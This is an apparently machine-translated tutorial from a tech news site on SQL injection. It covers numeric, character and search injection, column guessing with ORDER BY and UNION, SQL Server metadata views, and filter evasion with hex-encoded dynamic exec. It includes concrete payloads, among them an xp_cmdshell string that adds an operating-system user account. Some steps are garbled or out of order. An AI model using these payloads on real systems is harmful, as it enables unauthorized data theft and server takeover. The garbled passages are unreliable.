Shulou(Shulou.com)05/31 Report--

This article mainly explains "what are the ways to inject sql". The content in the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "what are the ways to inject sql?"

There are three ways of sql injection: 1, digital injection, when the input parameters are integers, there may be digital injection loopholes; 2, character injection, when the input parameters are strings, there may be character injection vulnerabilities; 3, search injection, search parameters are not filtered when data search.

The operating environment of this tutorial: windows7 system, python3 version, Dell G3 computer.

SQL injection principle

SQL injection attack refers to the introduction of Web applications by constructing special inputs as parameters, and most of these inputs are combinations of SQL syntax that execute SQL statements to perform the actions desired by the attackers. The main reason is that the program does not carefully filter the data entered by the user, resulting in illegal data intrusion into the system.

SQL injection classification

1. Digital injection

When the input parameter is an integer, there may be a digital injection vulnerability.

Suppose there is a URL of: HTTP://www.aaa.com/test.php?id=1

You can guess the background SQL statement as follows:

SELECT * FROM table WHERE id=1

SQL injection points to determine digital vulnerabilities:

① first enter a single quotation mark in the input box'

Such a SQL statement would become:

SELECT * FROM table WHERE id=1'

It does not conform to the syntax, so the statement is bound to go wrong, causing the script to fail to get data from the database, resulting in an exception to the original page.

② enter and 1 = 1 in the input box

The SQL statement changes to:

SELECT * FROM table WHERE id=1 and 1 = 1

The statement is correct, the execution is normal, and the returned data is no different from the original request.

③ enters and 1 = 2 in the database

The SQL statement changes to:

SELECT * FROM table WHERE id=1 and 1 = 2

Although the syntax is correct and the statement executes normally, the logic is wrong. Because 1 = 2 is always false, the returned data is different from the original request.

If all the above three steps are met, there may be a digital SQL injection vulnerability in the program.

two。 Character injection

A character injection vulnerability may exist when the input parameter is a string. The biggest difference between numeric and character injection is that numeric types do not require single quotation mark closure, while character types generally need to be closed with single quotation marks.

The most important thing about character injection is how to close SQL statements and comment out redundant code.

Suppose the SQL statement in the background is as follows:

SELECT * FROM table WHERE username = 'admin'

SQL injection points to identify character vulnerabilities:

① or enter the single quotation mark admin' first to test

Such a SQL statement would become:

SELECT * FROM table WHERE username = 'admin''.

The page is abnormal.

② input: admin' and 1 = 1--

Note: there is a single quotation mark 'after the admin to close the string, and finally a comment-- (there is a space after the two bars!!) .

The SQL statement changes to:

SELECT * FROM table WHERE username = 'admin' and 1 = 1--

The page is displayed correctly.

③ input: admin' and 1 = 2--

The SQL statement changes to: (SELECT TOP 1 username FROM users)

Actuator error message:

This allows you to get the user's username root. Because in the subquery SELECT TOP 1 username FROM users, the first user name of the query is returned, the return type is of type varchar, and then compared with 1 of type int, the data of the two different types cannot be compared and an error is reported, resulting in data leakage.

Using this method, all account information can be derived recursively:

SELECT * FROM users WHERE username = 'abc' AND password =' abc' AND 1 > (SELECT TOP 1 username FROM users WHERE not in ('root')).

You can get the next user name by constructing this statement; if you change the username in the subquery to other column names, you can get information about other columns, which I won't repeat here.

two。 Get metadata

SQL Server provides a large number of views for easy access to metadata. You can guess the number of columns in the table first, and then use UNION to construct a SQL statement to get the data in it.

Such as:

SELECT * * FROM * * WHERE id = * UNION SELECT 1, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

If the number of columns in the current table is 2, the current database table can be obtained by the UNION statement. How to guess the number of columns in the current table is described later.

Some common system database views:

Database view shows all logins in all databases in SYS.DATABASESSQL Server SYS.SQL_LOGINSSQL Server all data tables in the current user database all columns in the current user database SYS.ALL_COLUMNS user-defined objects and all columns of the system object federated SYS.DATABASE_PRINCIPALS database each permission or column exception permission SYS.DATABASE_FILES is stored in the database Each object created in the SYSOBJECTS database, including constraints, Log and stored procedures) 3. ORDER BY clause guesses the number of columns

You can use the ORDER BY statement to determine the number of columns in the current table.

Such as:

① SELECT * FROM users WHERE id = 1--SQL execution is normal

② SELECT * FROM users WHERE id = 1 ORDER BY 1 (sorted by the first column)-SQL executes normally

③ SELECT * FROM users WHERE id = 1 ORDER BY 2 (sorted by second column)-SQL executes normally

④ SELECT * FROM users WHERE id = 1 ORDER BY 3 (sorted by the third column)-SQL executes normally

⑤ SELECT * FROM users WHERE id = 1 ORDER BY 4 (sorted by column 4)-- SQL throws an exception:

As a result, there are only three columns in the current table, because when sorting according to column 4, the Times is wrong. This method also applies to Oracle and MySql databases.

After knowing the number of columns, the attacker will usually proceed to the next attack with the UNION keyword.

4. UNION query

The UNION keyword combines two or more query results into a single result set, and most databases support UNION queries. However, the two results of UNION merging have the following basic rules:

The number of columns in all queries must be the same

Data types must be compatible

① guesses the number of columns with UNION query

You can guess the number of columns not only with the ORDER BY method, but also with the UNION method.

In the previously assumed user table, there are five columns. If we use UNION to federate the query:

SELECT * FROM users WHERE id = 1 UNION SELECT 1

The database issues an exception:

You can know the number of query fields for the User table through a recursive query until no error is generated:

UNION SELECT 1,2 、 UNION SELECT 1,2,3

You can also change the number after SELECT to null so that incompatible exceptions are not easy to occur.

② Joint query for sensitive Information

After knowing that the number of columns is 4, you can continue to inject using the following statement:

UNION SELECT'x tables, null, null, null FROM SYSOBJECT WHERE xtype='U' (Note: xtype='U' indicates that the object type is a table)

If the data type of the first column does not match and the database will report an error, you can recursively query until the statement is compatible. When the statement executes normally, you can replace x with a SQL statement to query sensitive information.

5. Using the system functions provided by SQL Server

SQL Server provides a number of system functions that allow you to access information in SQL Server system tables without using SQL query statements.

Such as:

SELECT suser_name (): returns the login ID of the user

SELECT user_name (): returns the database user name based on the specified identification number

SELECT db_name (): returns the database name

SELECT is_member ('db_owner'): whether it is a database role or not

SELECT convert (int,'5'): data type conversion

6. Stored procedure

Stored procedures (Stored Procedure) are a set of SQL "functions" that perform specific functions in a large database system, such as executing system commands, viewing the registry, reading disk directories, and so on.

The longest stored procedure used by an attacker is "xp_cmdshell", which allows the user to execute operating system commands.

For example, if there is an injection point in http://www.aaa.org/test.aspx?id=1, an attacker can carry out a command attack:

Http://www.aaa.org/test.aspx?id=1 investors exec xp_cmdshell 'net user test test / add'

The final executed SQL statement is as follows:

SELECT * FROM table WHERE id=1; exec xp_cmdshell 'net user test test / add'

The statement after the semicolon can create a new user with the user name test and password test on the other server.

Note: not any database user can use such stored procedures, and the user must have CONTROL SERVER privileges.

Common hazard stored procedures are as follows:

The stored procedure states that sp_addlogin creates a new SQL Server login that allows the user to connect to the SQL Server instance sp_dropuser using the SQL Server identity to delete the database user xp_enumgroups provides the Microsoft Windows local group list or defines the global group list in the specified Windows domain xp_regread read registry xp_regwrite write registry xp_redeletevalue delete registry xp_dirtree read directory sp_password change password xp_servicecontrol stops or activates a service

In addition, any database requires specific permissions when using special functions or stored procedures. The roles and permissions of common SQL Server databases are as follows:

Role permissions bulkadmin can run BULK INSERT statements dbcreator can create, change, delete and restore any database diskadmin can manage disk files processadmin can plant instances running in the database engine securityadmin can manage logins and their properties; you can take advantage of permissions at the GRANT, DENY and REVOKE server levels; you can also take advantage of permissions at the GRANT, DENY and REVOKE database levels In addition, you can reset the password of the SQL Server login serveradmin can change server-wide configuration options and shut down the server setupadmin can add and remove linked servers, and can execute some system stored procedures sysadmin can perform any activity in the database engine 7. Dynamic execution

SQL Server supports dynamic execution of statements, and users can submit a string to execute SQL statements.

For example, exec ('SELECT username, password FROM users')

It can also be executed using the exec function by defining a hexadecimal SQL statement. Most Web applications and firewalls filter single quotation marks. Using exec to execute hexadecimal SQL statements can break through many firewalls and anti-injection programs, such as:

Declare @ query varchar select @ query=0x73656C6563742031exec (@ query)

Or:

Declare/**/@query/**/varchar / * * / select/**/@query=0x73656C6563742031/**/exec (@ query)

Thank you for your reading, these are the contents of "what are the ways of sql injection?" after the study of this article, I believe you have a deeper understanding of the way of sql injection, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.